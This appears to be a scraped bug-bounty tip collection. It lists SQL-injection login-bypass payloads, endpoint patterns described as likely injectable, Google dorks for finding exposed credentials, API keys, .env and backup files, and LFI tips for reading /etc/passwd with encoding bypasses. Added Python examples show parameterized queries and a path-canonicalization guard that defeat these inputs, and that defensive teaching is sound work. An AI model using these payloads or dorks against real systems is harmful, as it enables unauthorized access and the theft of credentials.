Bug Bounty - GitBook
Everything 4 bug bounty https://t.me/GiftWay32robot?start=_tgr_HwZ24DI5MWJk
Posts Archive
Now SQL Injection - another Bypass Auth Payloads
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or 1=1--
or true--
" or true--
' or true--
")or true--
') or true--
' or 'x'='x
) or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
credit: @mamunwhh
http://GitBook_s.t.me
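Why the single-quote payloads listed in the post above defeat a login check built by string concatenation, and how a parameterized query treats the same input as plain data. This is an added example, not part of the original post; the table, the account and the function names are constructed for illustration, and SQLite stands in for the application's database.

```python
import sqlite3

# Two payloads quoted from the post; the single-quote variants match the
# quoting used in the constructed query below.
PAYLOADS = ["' or 'x'='x", "' or true--"]

def make_db():
    """In-memory database holding one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to keep the example short.
    db.execute("INSERT INTO users VALUES ('alice', 'constructed-secret')")
    return db

def login_concat(db, username, password):
    """Vulnerable: user input is spliced into the SQL text itself."""
    sql = ("SELECT 1 FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_param(db, username, password):
    """Hardened: placeholders keep input out of the SQL grammar."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    for p in PAYLOADS:
        # Same input in both fields, as in the login.* entries of the list.
        print(repr(p), "concat:", login_concat(db, p, p),
              "param:", login_param(db, p, p))
```

With the concatenated query the quote in the payload closes the string literal and the trailing `or` clause makes the `WHERE` condition true for every row; with placeholders the whole payload is compared as a literal username and matches nothing.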
These SQLi endpoints are most likely vulnerable:
.php:
1. index.php?category=<SQLi payload>
2. product.php?id=<SQLi payload>
3. news.php?article_id=<SQLi payload>
4. user.php?username=<SQLi payload>
5. login.php?username=<SQLi payload>&password=<SQLi payload>
6. search.php?q=<SQLi payload>
7. blog.php?post_id=<SQLi payload>
8. forum.php?thread_id=<SQLi payload>
9. profile.php?user_id=<SQLi payload>
10. admin.php?username=<SQLi payload>&password=<SQLi payload>
.asp:
1. default.asp?catid=<SQLi payload>
2. product.asp?id=<SQLi payload>
3. news.asp?newsid=<SQLi payload>
4. login.asp?username=<SQLi payload>&password=<SQLi payload>
5. search.asp?q=<SQLi payload>
6. blog.asp?postid=<SQLi payload>
7. forum.asp?threadid=<SQLi payload>
8. profile.asp?userid=<SQLi payload>
9. admin.asp?username=<SQLi payload>&password=<SQLi payload>
10. register.asp?username=<SQLi payload>&password=<SQLi payload>
.aspx:
1. default.aspx?catid=<SQLi payload>
2. product.aspx?id=<SQLi payload>
3. news.aspx?newsid=<SQLi payload>
4. login.aspx?username=<SQLi payload>&password=<SQLi payload>
5. search.aspx?q=<SQLi payload>
6. blog.aspx?postid=<SQLi payload>
7. forum.aspx?threadid=<SQLi payload>
8. profile.aspx?userid=<SQLi payload>
9. admin.aspx?username=<SQLi payload>&password=<SQLi payload>
10. register.aspx?username=<SQLi payload>&password=<SQLi payload>
.cfm:
1. index.cfm?catid=<SQLi payload>
2. product.cfm?id=<SQLi payload>
3. news.cfm?newsid=<SQLi payload>
4. login.cfm?username=<SQLi payload>&password=<SQLi payload>
5. search.cfm?q=<SQLi payload>
6. blog.cfm?postid=<SQLi payload>
7. forum.cfm?threadid=<SQLi payload>
8. profile.cfm?userid=<SQLi payload>
9. admin.cfm?username=<SQLi payload>&password=<SQLi payload>
10. register.cfm?username=<SQLi payload>&password=<SQLi payload>
.jsp:
1. index.jsp?catid=<SQLi payload>
2. product.jsp?id=<SQLi payload>
3. news.jsp?newsid=<SQLi payload>
4. login.jsp?username=<SQLi payload>&password=<SQLi payload>
5. search.jsp?q=<SQLi payload>
6. blog.jsp?postid=<SQLi payload>
7. forum.jsp?threadid=<SQLi payload>
8. profile.jsp?userid=<SQLi payload>
9. admin.jsp?username=<SQLi payload>&password=<SQLi payload>
10. register.jsp?username=<SQLi payload>&password=<SQLi payload>
If you are having trouble reading Medium writeups, you can use the two sites below and read without restriction.
1. Readmedium.com
2. Freedium.cfd
Learn Authentication The Hard Way
Part I
https://www.andrew-best.com/posts/learn-auth-the-hard-way-part-one
Part II
https://www.andrew-best.com/posts/learn-auth-the-hard-way-part-two
Part III
https://www.andrew-best.com/posts/learn-auth-the-hard-way-part-three
Pentester Guide
A Comprehensive Resource for Pentesters: Tools, Methodologies, Scripts, Certifications, Learning Resources, Labs, Career Opportunities, Entertainment, and Freelancing Tips.
Link: https://github.com/ZishanAdThandar/pentest/tree/main/notes
Useful Google Dorks that bug bounty hunters can leverage to find sensitive information: 👇🏻
1. Discovering Exposed Files:
- intitle:"index of" site:target.com
- filetype:log inurl:log site:target.com
- filetype:sql inurl:sql site:target.com
- filetype:env inurl:.env site:target.com
2. Finding Sensitive Directories:
- inurl:/phpinfo.php site:target.com
- inurl:/admin site:target.com
- inurl:/backup site:target.com
- inurl:wp- site:target.com
3. Exposed Configuration Files:
- filetype:config inurl:config site:target.com
- filetype:ini inurl:wp-config.php site:target.com
- filetype:json inurl:credentials site:target.com
4. Discovering Usernames and Passwords:
- intext:"password" filetype:log site:target.com
- intext:"username" filetype:log site:target.com
- filetype:sql "password" site:target.com
5. Finding Database Files:
- filetype:sql inurl:db site:target.com
- filetype:sql inurl:dump site:target.com
- filetype:bak inurl:db site:target.com
6. Exposed Git Repositories:
- inurl:".git" site:target.com
- inurl:"/.git/config" site:target.com
- intitle:"index of" ".git" site:target.com
7. Finding Publicly Exposed Emails:
- intext:"email" site:target.com
- inurl:"contact" intext:"@target.com" -www.target.com
- filetype:xls inurl:"email" site:target.com
8. Discovering Vulnerable Web Servers:
- intitle:"Apache2 Ubuntu Default Page: It works" site:target.com
- intitle:"Index of /" "Apache Server" site:target.com
- intitle:"Welcome to nginx" site:target.com
9. Finding API Keys:
- filetype:env "DB_PASSWORD" site:target.com
- intext:"api_key" filetype:env site:target.com
- intext:"AWS_ACCESS_KEY_ID" filetype:env site:target.com
10. Exposed Backup Files:
- filetype:bak inurl:backup site:target.com
- filetype:zip inurl:backup site:target.com
- filetype:tgz inurl:backup site:target.com
https://t.me/RahaRM_Official
a personal channel covering topics like security, web development, programming and more
🔍 LFI Hunting Tips from Real Finds:
1️⃣ GET path injection: Try ///../../../../etc/passwd. Fuzz w/ Burp!
2️⃣ POST LFIs: Test endpoints like /router.jsp?../etc/passwd.
3️⃣ Hidden params: Brute-force w/ ParamSpider or check JS files.
💡 Bypass filters w/ %2e%2f or %00
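The inputs named in the tips above (leading slashes with `../`, `%2e%2f`, `%00`) all fail against a handler that canonicalizes the requested path and checks it against a fixed base directory before opening anything. This is an added example, not part of the original post; `BASE_DIR` and `resolve_include` are hypothetical names, and the function assumes it receives the raw, still-encoded parameter value.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/srv/app/pages"  # hypothetical content root

def resolve_include(user_path, base_dir=BASE_DIR):
    """Return the absolute path inside base_dir, or None if rejected."""
    decoded = user_path
    # Decode until stable so double-encoded input (%252e%252f) is judged
    # in its final form; input still changing after 3 rounds is rejected.
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        return None
    # A NUL byte (%00) has no place in a file name.
    if "\x00" in decoded:
        return None
    base = os.path.realpath(base_dir)
    # Strip leading slashes so the value cannot replace the base in join(),
    # then collapse "..", "." and symlinks before comparing.
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

if __name__ == "__main__":
    # Constructed inputs: one legitimate, three from the tips above.
    for p in ["help/faq.html",
              "///../../../../etc/passwd",
              "%2e%2e%2f%2e%2e%2fetc/passwd",
              "faq.html%00.jpg"]:
        print(repr(p), "->", resolve_include(p))
```

The check runs on the fully resolved path, which is also the value returned for opening, so the string that was validated and the string that is used cannot differ.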

